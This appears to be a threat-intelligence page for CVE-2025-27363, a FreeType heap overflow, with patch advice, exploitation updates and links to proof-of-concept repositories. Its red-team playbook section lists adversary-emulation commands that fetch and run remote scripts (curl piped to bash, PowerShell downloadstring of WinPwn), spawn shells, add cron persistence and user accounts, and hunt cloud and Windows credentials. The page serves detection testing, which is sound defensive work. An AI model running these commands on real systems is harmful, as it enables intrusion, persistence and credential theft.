CVE-2025-27363
Overview
This vulnerability is a heap-based buffer overflow caused by an out-of-bounds write in FreeType's font subglyph parsing logic. Specifically, the flaw arises when a signed short value is assigned to an unsigned long and incremented, leading to an integer wraparound that results in allocating an insufficiently sized heap buffer. The affected component is the TrueType GX and variable font subglyph handling code in FreeType versions 2.13.0 and earlier.
Vulnerability Description
An out of bounds write exists in FreeType versions 2.13.0 and below (newer versions of FreeType are not vulnerable) when attempting to parse font subglyph structures related to TrueType GX and variable font files. The vulnerable code assigns a signed short value to an unsigned long and then adds a static value causing it to wrap around and allocate too small of a heap buffer. The code then writes up to 6 signed long integers out of bounds relative to this buffer. This may result in arbitrary code execution. This vulnerability may have been exploited in the wild.
Impact
An attacker can exploit this vulnerability by supplying a malicious font file to an application using the affected FreeType versions, causing heap corruption that can lead to arbitrary code execution. This requires no authentication or user interaction beyond processing the crafted font. Successful exploitation can result in full system compromise or execution of arbitrary commands within the context of the vulnerable application, posing a critical risk to confidentiality, integrity, and availability of affected systems.
Solution
Users should upgrade FreeType to a version newer than 2.13.0, as versions above this contain the fix for the heap buffer overflow. The Facebook security advisory at https://www.facebook.com/security/advisories/cve-2025-27363 provides detailed patch information. Debian users should apply the security updates available for Debian Linux 11.0 or later, which include the corrected FreeType package. No specific workarounds are documented beyond applying these vendor-provided patches.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question arises from an out-of-bounds write condition present in specific versions of the FreeType library, particularly those up to 2.13.0. The flaw is rooted in the handling of font subglyph structures associated with TrueType GX and variable font files. The code responsible for parsing these structures improperly assigns a signed short value to an unsigned long variable, which can lead to integer overflow. This overflow occurs when a static value is added to the signed short, causing the resultant value to wrap around and allocate a heap buffer that is insufficient for the intended data. Consequently, this misallocation allows for the potential writing of up to six signed long integers beyond the allocated memory bounds, creating a pathway for arbitrary code execution.
Exploitation of this vulnerability can occur through various attack vectors, primarily involving the manipulation of font files. An attacker could craft a malicious font file that, when processed by an application utilizing the vulnerable FreeType library, triggers the out-of-bounds write condition. This could happen in scenarios where applications dynamically load and render fonts, such as web browsers, document viewers, or graphic design software. If an unsuspecting user opens a document or visits a website containing the malicious font, the attacker could gain control over the affected system, leading to unauthorized access, data exfiltration, or further compromise of the network.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on FreeType for font rendering in their applications. Given the CVSS score of 8.1, the vulnerability is classified as high severity, indicating a substantial risk to business operations. If exploited, it could lead to severe consequences, including loss of sensitive data, disruption of services, and damage to reputation. Furthermore, the potential for exploitation in the wild underscores the urgency for organizations to address this vulnerability promptly. Businesses that fail to mitigate the risk may find themselves facing regulatory scrutiny, financial losses, and a decline in customer trust.
To detect and mitigate this vulnerability, organizations should prioritize updating to the latest version of FreeType, as newer releases have addressed the flaw. Regularly monitoring software dependencies and applying security patches is essential in maintaining a secure environment. Additionally, implementing application whitelisting can help prevent the execution of unauthorized code that may arise from exploitation attempts. Employing intrusion detection systems (IDS) can also assist in identifying anomalous behavior indicative of an attempted exploit. Furthermore, educating users about the risks associated with opening untrusted documents or files can reduce the likelihood of successful exploitation.
In conclusion, the out-of-bounds write vulnerability in FreeType represents a critical risk to systems that utilize this library for font processing. The potential for arbitrary code execution through crafted font files poses a significant threat to both individual users and organizations alike. By understanding the technical details, attack vectors, and real-world implications of this vulnerability, cybersecurity professionals can develop effective detection and mitigation strategies to safeguard their environments against exploitation.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-27363, with initial confirmed sightings emerging after a period of dormancy. This uptick coincides with the recent public release of multiple proof-of-concept exploits hosted on popular code-sharing platforms, which have garnered increased attention within the security research community. Although the EPSS score shows a slight decline, the practical availability of these exploits lowers the barrier to entry for threat actors, potentially accelerating weaponization efforts. Our telemetry indicates that while the overall exploitation trend is not rapidly increasing, the presence of active exploitation attempts signals a shift from theoretical risk to tangible threat. This development is significant for defenders as it underscores the urgency of verifying patch deployment and monitoring for indicators of compromise related to FreeType font parsing. The risk level has consequently elevated from a latent vulnerability to an actively targeted weakness, warranting heightened vigilance in environments utilizing affected FreeType versions.
Update 2 — May 16, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-27363, reflected by a significant uptick in telemetry signals and a corresponding rise in the Exploit Prediction Scoring System (EPSS). This upward trend indicates that threat actors are increasingly leveraging available proof-of-concept exploits to probe vulnerable FreeType implementations, shifting the vulnerability from a theoretical concern to an actively exploited vector. The growing exploitation activity heightens the risk of arbitrary code execution in affected environments, particularly given FreeType’s widespread integration in various software products. Consequently, the threat level has been elevated to reflect a more immediate and tangible danger, underscoring the critical need for defenders to prioritize detection and response measures around this vulnerability.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Freetype | Freetype | All |
cpe:2.3:a:freetype:freetype:*:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 11.0 |
cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
zhuowei/CVE-2025-27363-proof-of-concept
|
zhuowei | 38 | 6 | 2025-03-23 | View |
|
tin-z/CVE-2025-27363
Integer overflow in FreeType software, which also affects Chrome
|
tin-z | 31 | 11 | 2025-07-23 | View |
|
ov3rf1ow/CVE-2025-27363
|
ov3rf1ow | 3 | 1 | 2025-05-26 | View |
Threat Feed
6 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.